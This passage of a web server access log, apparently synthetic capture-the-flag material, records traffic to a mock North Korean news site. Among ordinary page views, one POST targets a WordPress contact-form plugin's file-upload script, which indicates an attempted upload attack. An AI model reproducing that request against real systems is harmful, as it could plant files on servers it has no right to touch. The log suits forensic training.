/en/dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 3618 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +76.179.209.126 - - [23/Jul/2020:11:30:21 -0500] "GET / HTTP/1.1" 200 2425 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +145.242.249.197 - - [23/Jul/2020:11:30:22 -0500] "GET /en/greetings-to-kim-jong-un-from-v-putin/ HTTP/1.1" 200 11499 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:30:23 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +52.199.219.87 - - [23/Jul/2020:11:30:26 -0500] "GET /quality-waterproof-liquid-made/ HTTP/1.1" 200 9805 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)" +23.253.115.248 - - [23/Jul/2020:11:30:28 -0500] "GET /en/dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 2706 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +77.59.82.58 - - [23/Jul/2020:11:30:31 -0500] "POST /en/loving-care-for-people-source-of-dprks-invincibility/ HTTP/1.1" 200 12155 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0" +119.171.127.177 - - [23/Jul/2020:11:30:35 -0500] "GET /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 200 4262 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +93.215.244.140 - - [23/Jul/2020:11:30:39 -0500] "GET /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.0" 200 13248 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +136.176.2.110 - - [23/Jul/2020:11:30:42 -0500] "GET /latest-rocket/ HTTP/1.1" 400 10331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +150.104.81.119 - - [23/Jul/2020:11:30:43 -0500] "POST /en/new-books-published-in-dprk/ HTTP/1.1" 200 12572 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:30.0) Gecko/20100101 Firefox/30.0" +19.157.183.141 - - [23/Jul/2020:11:30:45 -0500] "GET /en/fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 8475 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +217.44.248.80 - - [23/Jul/2020:11:30:48 -0500] "GET / HTTP/1.1" 400 11538 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" +161.63.166.42 - - [23/Jul/2020:11:30:52 -0500] "POST /en/many-medical-scientific-achievements-made/ HTTP/1.1" 200 14778 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:30:53 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +136.7.58.230 - - [23/Jul/2020:11:30:56 -0500] "GET /north-kiringul-missile-program/ HTTP/1.1" 200 5896 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53" +19.25.71.249 - - [23/Jul/2020:11:30:57 -0500] "GET /pyingpong-puppet-company/ HTTP/1.1" 200 14611 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" +154.42.231.154 - - [23/Jul/2020:11:31:01 -0500] "GET /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 301 13870 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" +153.39.25.10 - - [23/Jul/2020:11:31:03 -0500] "GET /en/first-graduation-ceremony-of-tele-education-college-under-kim-chaek-university-of-technology-held/ HTTP/1.0" 200 2003 "-" "Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" +10.13.0.151 - - [23/Jul/2020:11:31:04 -0400] "POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1" 200 906 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" +121.103.89.105 - - [23/Jul/2020:11:31:07 -0500] "GET /kumdang-2-injection-manufactured/ HTTP/1.0" 200 5786 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +39.116.158.113 - - [23/Jul/2020:11:31:09 -0500] "POST /en/new-mushroom-research-institute-inaugurated/ HTTP/1.0" 200 2398 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +152.212.73.24 - - [23/Jul/2020:11:31:12 -0500] "GET /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 3910 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53" +229.78.43.26 - - [23/Jul/2020:11:31:14 -0500] "GET /en/ HTTP/1.1" 500 4373 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +80.78.106.226 - - [23/Jul/2020:11:31:18 -0500] "POST /kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.1" 400 6890 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +234.37.144.173 - - [23/Jul/2020:11:31:20 -0500] "GET /en/3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 7319 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" +227.241.169.107 - - [23/Jul/2020:11:31:21 -0500] "POST /kumdang-2-injection-manufactured/ HTTP/1.1" 200 7306 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +166.200.243.36 - - [23/Jul/2020:11:31:22 -0500] "GET /tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 3051 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +192.168.51.66 - - [23/Jul/2020:11:31:23 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +170.55.37.149 - - [23/Jul/2020:11:31:26 -0500] "GET /us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 404 6026 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +241.226.51.163 - - [23/Jul/2020:11:31:30 -0500] "POST /new-national-record-set-in-archery/ HTTP/1.1" 200 6877 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +23.125.228.135 - - [23/Jul/2020:11:31:34 -0500] "GET /new-kind-of-flowerpot-invented/ HTTP/1.1" 500 4329 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +188.123.115.33 - - [23/Jul/2020:11:31:38 -0500] "GET /sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 304 4616 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +187.112.224.150 - - [23/Jul/2020:11:31:39 -0500] "POST /tablet-computer-popular-in-dprk/ HTTP/1.1" 403 10496 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +46.167.92.157 - - [23/Jul/2020:11:31:40 -0500] "GET /ultimate-technology/ HTTP/1.1" 200 9875 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +170.33.41.158 - - [23/Jul/2020:11:31:43 -0500] "GET / HTTP/1.1" 200 3427 "http://www.yahoo.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +158.151.133.79 - - [23/Jul/2020:11:31:46 -0500] "POST /en/ HTTP/1.0" 200 8549 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +244.203.160.113 - - [23/Jul/2020:11:31:50 -0500] "GET /en/ HTTP/1.0" 200 7034 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50" +192.168.51.66 - - [23/Jul/2020:11:31:53 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +37.177.184.215 - - [23/Jul/2020:11:31:53 -0500] "POST /en/nuke-the-chinese/ HTTP/1.0" 301 11845 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53" +231.97.28.161 - - [23/Jul/2020:11:31:54 -0500] "GET /en/dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 2698 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:30.0) Gecko/20100101 Firefox/30.0" +67.31.74.220 - - [23/Jul/2020:11:31:56 -0500] "GET /pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 500 13230 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +139.117.152.3 - - [23/Jul/2020:11:32:00 -0500] "POST /nanotechnology-exhibition-in-dprk/ HTTP/1.1" 200 2440 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +117.183.186.119 - - [23/Jul/2020:11:32:04 -0500] "POST /us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 301 12764 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +245.222.19.52 - - [23/Jul/2020:11:32:07 -0500] "GET /en/royal-blood-fresh-elixir-of-life/ HTTP/1.1" 200 6940 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" +213.248.42.230 - - [23/Jul/2020:11:32:08 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 200 12736 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0" +226.32.74.153 - - [23/Jul/2020:11:32:11 -0500] "POST / HTTP/1.1" 200 12304 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25" +149.168.16.164 - - [23/Jul/2020:11:32:13 -0500] "GET / HTTP/1.1" 200 7275 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" +65.227.196.160 - - [23/Jul/2020:11:32:15 -0500] "GET /kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 10236 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +204.67.22.117 - - [23/Jul/2020:11:32:18 -0500] "GET /en/fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 2252 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0" +86.108.233.225 - - [23/Jul/2020:11:32:21 -0500] "POST /royal-blood-fresh-elixir-of-life/ HTTP/1.1" 200 14597 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +116.169.225.83 - - [23/Jul/2020:11:32:22 -0500] "GET / HTTP/1.1" 200 14640 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0" +192.168.51.66 - - [23/Jul/2020:11:32:23 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +140.86.118.93 - - [23/Jul/2020:11:32:25 -0500] "POST /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 11174 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +32.104.21.240 - - [23/Jul/2020:11:32:27 -0500] "POST /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 200 4014 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" +74.144.94.215 - - [23/Jul/2020:11:32:29 -0500] "GET /en/ HTTP/1.1" 200 3589 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14" +100.198.113.162 - - [23/Jul/2020:11:32:32 -0500] "POST /phyongchon-pickle-factory/ HTTP/1.1" 200 3188 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +199.198.125.104 - - [23/Jul/2020:11:32:34 -0500] "GET /en/ryomyong-street-under-construction-in-pyongyang/ HTTP/1.1" 200 10447 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0" +206.187.195.138 - - [23/Jul/2020:11:32:36 -0500] "POST /en/kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 9848 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +18.77.161.39 - - [23/Jul/2020:11:32:37 -0500] "GET /en/ HTTP/1.1" 200 3983 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +3.128.194.98 - - [23/Jul/2020:11:32:41 -0500] "GET /song-we-are-the-happiest-in-the-world/ HTTP/1.1" 200 8823 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" +211.220.108.219 - - [23/Jul/2020:11:32:43 -0500] "GET /99-problems/ HTTP/1.1" 500 4141 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +195.246.105.244 - - [23/Jul/2020:11:32:46 -0500] "POST /dancing-parties-held/ HTTP/1.1" 200 11782 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +72.110.158.141 - - [23/Jul/2020:11:32:49 -0500] "GET /en/soy-based-dishes-popular-at-cooking-festival/ HTTP/1.0" 500 8701 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0" +192.168.51.66 - - [23/Jul/2020:11:32:53 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +230.152.210.72 - - [23/Jul/2020:11:32:53 -0500] "GET /en/sudoku/ HTTP/1.1" 404 7306 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +26.234.190.114 - - [23/Jul/2020:11:32:55 -0500] "GET /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 14304 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +112.60.129.64 - - [23/Jul/2020:11:32:56 -0500] "GET /kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 5013 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +50.250.12.60 - - [23/Jul/2020:11:33:00 -0500] "GET /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 7076 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +152.206.41.94 - - [23/Jul/2020:11:33:01 -0500] "GET /en/pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 301 3038 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:51.0) Gecko/20100101 Firefox/51.0" +224.86.91.126 - - [23/Jul/2020:11:33:03 -0500] "GET /new-books-published-in-dprk/ HTTP/1.1" 200 14347 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +175.189.109.54 - - [23/Jul/2020:11:33:05 -0500] "GET /en/new-medicine-developed-in-dprk/ HTTP/1.1" 200 5739 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +220.242.121.152 - - [23/Jul/2020:11:33:07 -0500] "GET /kim-jong-fun/ HTTP/1.1" 200 12009 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +130.149.120.101 - - [23/Jul/2020:11:33:10 -0500] "GET / HTTP/1.1" 200 9309 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" +199.122.166.228 - - [23/Jul/2020:11:33:13 -0500] "POST /en/kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 304 11788 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/55.0.2883.87 Chrome/55.0.2883.87 Safari/537.36" +135.57.20.15 - - [23/Jul/2020:11:33:17 -0500] "GET /kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 14171 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +189.166.47.39 - - [23/Jul/2020:11:33:20 -0500] "GET /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.0" 200 10830 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +61.172.103.136 - - [23/Jul/2020:11:33:24 -0500] "GET /en/ HTTP/1.1" 200 7033 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +74.4.163.175 - - [23/Jul/2020:11:33:27 -0500] "POST /kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 4925 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.79 Mobile/14D27 Safari/602.1" +145.44.189.222 - - [23/Jul/2020:11:33:29 -0500] "GET /kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 200 10209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +95.8.136.157 - - [23/Jul/2020:11:33:32 -0500] "GET /lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 301 2906 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +198.220.113.241 - - [23/Jul/2020:11:33:35 -0500] "GET /kim-jong-fun/ HTTP/1.0" 400 8849 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +73.29.4.47 - - [23/Jul/2020:11:33:36 -0500] "POST /dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 200 3049 "http://www.yahoo.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53" +95.228.49.168 - - [23/Jul/2020:11:33:39 -0500] "GET /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.0" 200 12535 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +199.102.41.57 - - [23/Jul/2020:11:33:40 -0500] "GET /2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.1" 400 12313 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +130.34.94.96 - - [23/Jul/2020:11:33:43 -0500] "POST /kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 3336 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4" +197.60.147.13 - - [23/Jul/2020:11:33:46 -0500] "GET /en/stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 14215 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +113.228.194.117 - - [23/Jul/2020:11:33:47 -0500] "POST / HTTP/1.1" 200 7475 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +243.56.251.20 - - [23/Jul/2020:11:33:51 -0500] "GET /new-mushroom-research-institute-inaugurated/ HTTP/1.1" 400 7546 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.5.17 (KHTML, like Gecko) Version/8.0.5 Safari/600.5.17" +192.168.51.66 - - [23/Jul/2020:11:33:53 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +170.43.14.237 - - [23/Jul/2020:11:33:53 -0500] "GET /us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 9097 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +133.104.216.154 - - [23/Jul/2020:11:33:57 -0500] "GET /pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 200 6281 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +235.18.213.78 - - [23/Jul/2020:11:33:58 -0500] "GET /tele-education-system-upgraded/ HTTP/1.1" 200 13777 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +161.35.188.153 - - [23/Jul/2020:11:34:00 -0500] "GET /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 7128 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +133.107.230.70 - - [23/Jul/2020:11:34:02 -0500] "GET /ultimate-technology/ HTTP/1.1" 200 14622 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +234.216.175.184 - - [23/Jul/2020:11:34:05 -0500] "POST /mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 5352 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +224.87.93.204 - - [23/Jul/2020:11:34:06 -0500] "GET /new-mushroom-research-institute-inaugurated/ HTTP/1.1" 200 5986 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +80.236.49.145 - - [23/Jul/2020:11:34:09 -0500] "POST /en/north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 200 8987 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +87.21.103.10 - - [23/Jul/2020:11:34:10 -0500] "POST /2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.1" 200 14755 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +186.45.209.22 - - [23/Jul/2020:11:34:14 -0500] "GET /tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 3929 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" +131.14.75.112 - - [23/Jul/2020:11:34:17 -0500] "GET /latest-rocket/ HTTP/1.0" 200 8159 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +147.204.119.223 - - [23/Jul/2020:11:34:19 -0500] "GET /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.0" 301 2562 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.5.17 (KHTML, like Gecko) Version/8.0.5 Safari/600.5.17" +191.135.86.193 - - [23/Jul/2020:11:34:21 -0500] "POST /en/many-medical-scientific-achievements-made/ HTTP/1.1" 200 8702 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:34:23 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; 